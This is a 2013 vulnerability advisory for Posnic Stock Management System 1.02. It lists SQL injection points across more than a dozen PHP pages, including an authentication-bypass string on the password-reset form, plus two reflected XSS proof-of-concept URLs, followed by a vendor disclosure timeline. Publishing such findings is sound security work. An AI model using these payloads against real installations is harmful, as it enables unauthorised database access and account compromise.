Posnic Stock Management System 1.02 - Multiple Vulnerabilities



# Exploit Title: Posnic Stock Management System 1.02 Multiple Vulnerabilities

# Date: 26 Sep 2013
# Vendor Homepage: http://www.posnic.com
# Software Link: http://sourceforge.net/projects/stockmanagement/?source=directory
# Version: 1.02
# Tested on: Win 7/Backtrack
# CVE :
# Exploit Author: Sarahma Security
# Author Homepage: http://sarahma.co.id
# Author Email: research@sarahma.co.id

========================
SQL Injection
========================
Found on
http://localhost/posnic/change_password.php 
parameter : old_pass
post data : change_pass=Save&confirm_pass=acUn3t1x&new_pass=acUn3t1x&old_pass=1{SQL_HERE}

Found on
http://localhost/posnic/forget_pass.php 
parameter : name 
Payload : 1' or 1 = '1

Found on
http://localhost/posnic/update_sales.php
parameter : sid
http://localhost/posnic/update_sales.php?sid=22{SQL_HERE}&table=stock_sales&return=view_sales.php

Found on
http://localhost/posnic/update_customer_details.php
parameter : sid
http://localhost/posnic/update_customer_details.php?sid=9{SQL_HERE}&table=customer_details&return=view_customers.php

Found on
http://localhost/posnic/update_purchase.php
parameter : sid
http://localhost/posnic/update_purchase.php?sid=SD263{SQL_HERE}&table=stock_entries&return=view_purchase.php

Found on
http://localhost/posnic/update_supplier.php
parameter : sid
http://localhost/posnic/update_supplier.php?sid=38{SQL_HERE}&table=supplier_details&return=view_supplier.php

Found on
http://localhost/posnic/update_stock.php
parameter : sid
http://localhost/posnic/update_stock.php?sid=35{SQL_HERE}&table=stock_details&return=view_product.php

Found on
http://localhost/posnic/update_payment.php
parameter : sid
http://localhost/posnic/update_payment.php?sid=SD266{SQL_HERE}&table=stock_entries&return=view_payments.php

Found on
http://localhost/posnic/view_sales.php 
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

Found on
http://localhost/posnic/view_customers.php
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

Found on
http://localhost/posnic/view_purchase.php 
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

Found on
http://localhost/posnic/view_supplier.php 
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

Found on
http://localhost/posnic/view_product.php 
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

Found on
http://localhost/posnic/view_payments.php 
parameter : searchtxt
post data : searchtxt=12{SQL_HERE}&Search=Search

========================
XSS Vulnerability
========================
Found On
http://localhost/posnic/forget_pass.php
parameter : msg
Ex :  http://localhost/posnic/forget_pass.php?msg=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Found On
http://localhost/posnic/index.php
parameter : msg
http://localhost/posnic/index.php?msg=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&type=error

 
========================
Solution :
========================
No Update Until This Advisory published
 
========================
Timeline:
========================
2013-09-19 Provided details vulnerability to vendor
2013-09-22 Vendor Reply Message
2013-09-25 No Response From Vendor
2013-09-26 Advisory published


###################################################################################################################

  ______                                __                                       ______                      
 /      \                              /  |                                     /      \                     
/000000  |  ______    ______   ______  00 |____   _____  ____    ______        /000000  |  ______    _______ 
00 \__00/  /      \  /      \ /      \ 00      \ /     \/    \  /      \       00 \__00/  /      \  /       |
00      \  000000  |/000000  |000000  |0000000  |000000 0000  | 000000  |      00      \ /000000  |/0000000/ 
 000000  | /    00 |00 |  00/ /    00 |00 |  00 |00 | 00 | 00 | /    00 |       000000  |00    00 |00 |      
/  \__00 |/0000000 |00 |     /0000000 |00 |  00 |00 | 00 | 00 |/0000000 |      /  \__00 |00000000/ 00 \_____ 
00    00/ 00    00 |00 |     00    00 |00 |  00 |00 | 00 | 00 |00    00 |      00    00/ 00       |00       |
 000000/   0000000/ 00/       0000000/ 00/   00/ 00/  00/  00/  0000000/        000000/   0000000/  0000000/ 
                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
###################################################################################################################